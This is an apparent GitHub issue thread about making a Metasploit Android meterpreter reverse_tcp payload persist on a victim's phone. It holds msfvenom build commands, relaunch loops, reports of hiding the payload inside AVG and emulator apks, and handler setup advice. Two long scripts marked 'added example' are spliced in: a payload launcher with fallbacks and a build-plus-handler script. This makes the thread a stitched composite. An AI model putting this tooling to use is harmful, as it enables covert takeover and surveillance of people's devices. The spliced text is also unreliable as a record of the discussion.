Metasploit-framework: probable payload bug Android

Created on 30 Sep 2016 · 30 comments · Source: rapid7/metasploit-framework

Hi, this is the first time I am writing here.
My problem is that I noticed that when I create the apk with this command:

msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=port -o /root/meterpreter.apk

and then install it on the victim's device without opening it yet, and create persistence for the apk with a .sh file that says this:

while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

it works the first time, but the second time it fails with this error:
Error type 3
Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.

I have metasploit-framework version 4.12.27 and Android version 6.0.1.

bug

All 30 comments

not sure if its relevant, but #7378 landed 2 days ago, does that fix it?

7362 is still open, also possibly dealing with the same thing

The reason for the error is that since https://github.com/rapid7/metasploit-payloads/pull/104 landed, the activity hides itself after its initial launch. I'm considering turning this into an option instead, as it seems to confuse people.
This is unrelated to 7362 and 7378.
You can replace am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
with am startservice com.metasploit.stage/.MainService, however I wouldn't recommend this approach as I'm not sure it works on recent versions (> 4.3 I think) of Android unless you run the script as shell/root.
The service is supposed to make the session persistent, however it's a trade-off with battery life. I suspect we can make the service a bit more aggressive in restarting the session (e.g. listening for CONNECTIVITY_CHANGE) at the expense of battery life :/
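The thread shows several distinct `am` failures (the hidden activity's "Error type 3", the INTERACT_ACROSS_USERS denial when `--user 0` is omitted, "Requires permission not exported", and "Not found; no service started"). The script below is an added example, not code from the thread or from the Metasploit project: it classifies the output of `am` so a launcher script can tell those cases apart and fall back from the activity to the service, always passing `--user 0`. The package and component names are the ones used by the stock msfvenom Android payload in this thread; the sample outputs in the test are copied from the comments above.

```sh
#!/bin/sh
# Added example (not part of the issue thread): classify what `am` printed so a
# script can tell the failure modes discussed above apart instead of blindly
# looping. Package/component names are those of the stock msfvenom payload.

PKG="com.metasploit.stage"

# classify_am_output: read `am ... 2>&1` output on stdin and print one word:
#   activity_missing   - "Error type 3 ... does not exist": the activity hid itself
#                        after its first launch (or the apk is not installed at all)
#   cross_user_denied  - INTERACT_ACROSS_USERS: ran without --user 0 on Android >= 4.3
#   not_exported       - "Requires permission not exported": component is not exported
#   not_found          - "Not found; no service started": wrong component name
#   ok                 - only a "Starting ..." line, no error
#   unknown            - anything else
# Error patterns are matched before the "Starting" line because am prints both.
classify_am_output() {
    out=$(cat)
    case "$out" in
        *"does not exist"*)                   echo activity_missing ;;
        *"INTERACT_ACROSS_USERS"*)            echo cross_user_denied ;;
        *"Requires permission not exported"*) echo not_exported ;;
        *"Not found; no service started"*)    echo not_found ;;
        *"Starting"*)                         echo ok ;;
        *)                                    echo unknown ;;
    esac
}

# start_payload_once: a single attempt. Try the activity first; if it is gone
# (hidden after first launch), fall back to the service as suggested in the
# thread. --user 0 is always passed to avoid the cross_user_denied case.
# Returns 0 on success, 1 otherwise.
start_payload_once() {
    res=$(am start --user 0 -a android.intent.action.MAIN -n "$PKG/.MainActivity" 2>&1 | classify_am_output)
    case "$res" in
        ok) return 0 ;;
        activity_missing)
            res=$(am startservice --user 0 "$PKG/.MainService" 2>&1 | classify_am_output)
            [ "$res" = ok ] ;;
        *)  echo "am start failed: $res" >&2; return 1 ;;
    esac
}

# Only attempt a launch when explicitly asked, so sourcing this file for its
# functions (or running it off-device) does not call am.
if [ "${1:-}" = "--once" ]; then
    start_payload_once
fi
```

Run it on the device as `sh launcher.sh --once` from an existing session. Note the maintainer's later point in this thread: the payload is meant to reconnect on its own, so a 20-second `while :` loop around this only produces duplicate sessions; the classifier is mainly useful for diagnosing why a one-off launch failed.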

I tried the command you told me, but this happened:

am startservice com.metasploit.stage/.MainService
Starting service: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=com.metasploit.stage/.MainService }
java.lang.SecurityException: Permission Denial: service asks to run as user -2 but is calling from user 0; this requires android.permission.INTERACT_ACROSS_USERS_FULL or android.permission.INTERACT_ACROSS_USERS
at android.os.Parcel.readException(Parcel.java:1620)
at android.os.Parcel.readException(Parcel.java:1573)
at android.app.ActivityManagerProxy.startService(ActivityManagerNative.java:4400)
at com.android.commands.am.Am.runStartService(Am.java:790)
at com.android.commands.am.Am.onRun(Am.java:364)
at com.android.internal.os.BaseCommand.run(BaseCommand.java:47)
at com.android.commands.am.Am.main(Am.java:103)
at com.android.internal.os.RuntimeInit.nativeFinishInit(Native Method)
at com.android.internal.os.RuntimeInit.main(RuntimeInit.java:257)

If I put the permissions inside the meterpreter, might it work?

Unfortunately this is because you're running on Android 6.0. That command will only work on Android 4.2 and lower. What makes you think the apk isn't currently persistent? Does the session not reconnect when you restart the device?

No, it doesn't. I tried so many times, but there is no persistence. Before this new hiding apk, the other one did not do this, because it worked great; persistence works fine on Android 6.0 devices.

@timwr would you like me to back out rapid7/metasploit-payloads#104 to switch it to configurable behavior later? I've been teaching a few folks here how to use Android meterpreter lately, and this is something that has been confusing for them too.

Granted, I haven't experienced a lack of persistence locally. Sounds like we might be debugging 2 problems here. Technically @hacksoldier98's original restart loop shouldn't be needed anymore.

Agreed this is confusing for people. Let's revert for now and I can make it configurable later on.
Apologies!

@hacksoldier98 my mistake. I thought on Android 4.3 and up the am startservice was blocked, but it actually still works if you include the --user 0 argument, e.g. you can still do:
am startservice --user 0 com.metasploit.stage/.MainService

Sorry @timwr, but it doesn't work. I have this error:
Error: Requires permission not exported from uid 10255

am com.metasploit.stage/.MainService will not run
There is no apk in /data/app

Because you haven't installed malware.apk on your phone.

@timwr are you trying to find the bug? If you have problems I can try to help, but I don't know much Java.

@hacksoldier98 I can't reproduce this unfortunately. Both am start and am startservice appear to work in the same way for me. We've reverted a change that prevented the am start command from working a second time.
The important thing is you actually shouldn't need to run either of those as the payload should be persistent anyway! If you're following this tutorial: http://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ it's out of date and unnecessary, and you'll just end up with more sessions which will make the OS more likely to kill all of your sessions.
If you're having issues with the payload reconnecting after connectivity loss then check that the LHOST on your handler is the same as the LHOST you give to msfvenom.

@timwr Yes, it is always the same, but the LHOST still does not connect, whether I use am startservice or am start. To tell the truth, startservice does start, but as soon as I exit and then immediately run exploit again, I have to wait a long time before it connects, or the connection does not come back at all.

@timwr Now I created a shell script that says this:

#!/bin/bash

am startservice --user 0 com.metasploit.stage/.MainService
am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity

After I saved it, I installed the backdoor built with my public IP, with the port forwarded to my local IP. After the installation was done I tapped open and the connection to my computer came up. From the computer I gave the shell command to start the script on Android, and this was the result:

Starting service: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=com.metasploit.stage/.MainService }
Error: Requires permission not exported from uid 10265
Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }
Error type 3
Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.

@timwr now the command to use an apk as a template doesn't work, because as soon as I install it on the device it crashes, and the connection only exists from the moment you open the program until it stops. I used AVG antivirus to put the malware in.

Any solution to this issue soon? There is no way currently to make the Android payload persistent.

Apologies for the delay. This is getting a bit confusing as there are a few potential issues flying around.

  • The original issue ("it works the first time but the second time fails with Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist") has been fixed. I'm (perhaps pre-emptively) closing this issue.
  • I don't recommend using the bash script method for persisting an Android payload as it results in multiple sessions and, as far as I know, doesn't make the payload more persistent.
  • #7362 contains a fix to make msfvenom -x with an Android payload persistent. Until this lands, only the payload generated without -x will be persistent.
  • Without -x the Android payload should already be persistent; if not, this is a bug. I'll look into this further.
  • @hacksoldier98 "as soon as I install it on the device it crashes": this looks like an issue specifically with the AVG apk. You'll need to look into this yourself with adb logcat and apktool.

I hope that makes sense :)

Thanks!

Regarding "Without -x the Android payload should already be persistent, if not this is a bug. I'll look into this further."

It depends on how you define persistent.
I generated the payload without -x; it connects only in two cases:
1- Once you install it and open it the first time.
2- And when the victim reboots the phone.

But it does not try to reconnect every 20 seconds for example...

And when I try to run the bash script it gives the error below:
Error type 3
Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.

@mahmoudissam , when I switch Wifi off I get a new session over the data connection, and a new one again when I re-enable Wifi. I'll try leaving a few phones overnight, using lots of memory, etc.

  • Is the LHOST on the handler you start exactly the same as the LHOST on the payload?
  • Which payload are you using? e.g. I'm testing with android/meterpreter/reverse_tcp
  • Are you sure you're setting set ExitOnSession false and running with exploit -j?

Many thanks for your help!

Hello Mate, thanks for your reply!

Here is the info:

1- Yes the LHOST are the same.
2- The command I use:
msfvenom -p android/meterpreter/reverse_tcp LHOST=domain.com LPORT=4444 R >shell.apk
3- I just use exploit (without -j); do I have to add -j?
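The maintainer's checklist above (identical LHOST on handler and payload, `set ExitOnSession false`, `exploit -j`) lends itself to a small script. The following is an added example, not code from the thread or from the Metasploit project: it derives both the msfvenom command and the msfconsole resource file from one pair of LHOST/LPORT values so the two cannot drift apart, and it can check an existing resource file against the value the apk was built with. The placeholder values domain.com, 4444 and shell.apk are the ones that appear in the comment above; msfvenom's `-o` flag is its output-file option, equivalent to the `R > shell.apk` form used there.

```sh
#!/bin/sh
# Added example (not from the issue thread): build the Android payload and the
# multi/handler resource file from the SAME LHOST/LPORT so they always match,
# and configure the handler to keep listening after the first session.

# Placeholder values taken from the thread; override via the environment.
LHOST="${LHOST:-domain.com}"
LPORT="${LPORT:-4444}"
PAYLOAD="android/meterpreter/reverse_tcp"
APK="${APK:-shell.apk}"

# handler_rc: print an msfconsole resource file for a persistent handler.
#   ExitOnSession false  - keep the listener up after a session arrives
#   exploit -j           - run the handler as a background job so reconnecting
#                          sessions keep being accepted
handler_rc() {
    cat <<EOF
use exploit/multi/handler
set PAYLOAD $PAYLOAD
set LHOST $LHOST
set LPORT $LPORT
set ExitOnSession false
exploit -j
EOF
}

# msfvenom_cmd: print the msfvenom command using the same values as handler_rc.
msfvenom_cmd() {
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -o %s\n' "$PAYLOAD" "$LHOST" "$LPORT" "$APK"
}

# lhost_matches RC_TEXT EXPECTED_LHOST: succeed only if the resource file text
# contains exactly "set LHOST <EXPECTED_LHOST>" (the mismatch the thread warns about).
lhost_matches() {
    printf '%s\n' "$1" | grep -qxF "set LHOST $2"
}

# lport_matches RC_TEXT EXPECTED_LPORT: same check for the port.
lport_matches() {
    printf '%s\n' "$1" | grep -qxF "set LPORT $2"
}

# Build the apk and start the handler only when asked, so the functions above
# can be sourced and checked without msfvenom/msfconsole installed.
if [ "${1:-}" = "--run" ]; then
    handler_rc > handler.rc
    msfvenom -p "$PAYLOAD" LHOST="$LHOST" LPORT="$LPORT" -o "$APK"
    msfconsole -q -r handler.rc
fi
```

Usage: `LHOST=203.0.113.5 LPORT=4444 sh build.sh --run`. To audit a hand-written resource file against the apk you already shipped, source the script and call `lhost_matches "$(cat handler.rc)" 203.0.113.5`.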

If you install the apk as root, then am will work and it is not necessary to specify --user 0.

If the program was running as root, then am runs it as root even if the user is not root.

But it is always better to put --user 0 in the am command.

I found out that if you hide the app it won't work.

I embedded the payload in an apk and can use it normally, both as the payload apk and as the original apk. It works and gives me meterpreter sessions and all, but after uploading the persistence bash script to my Android and executing it inside the shell it gives me an error.
I used the paid version of a GBA emulator for embedding.

Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }
Error type 3
Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.

Same problem here.

I have also used persistence.sh like the others discussed above.
I have the same problem.
When I use am startservice I get this error:
Starting service: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage./.MainActivity }
Error: Not found; no service started.
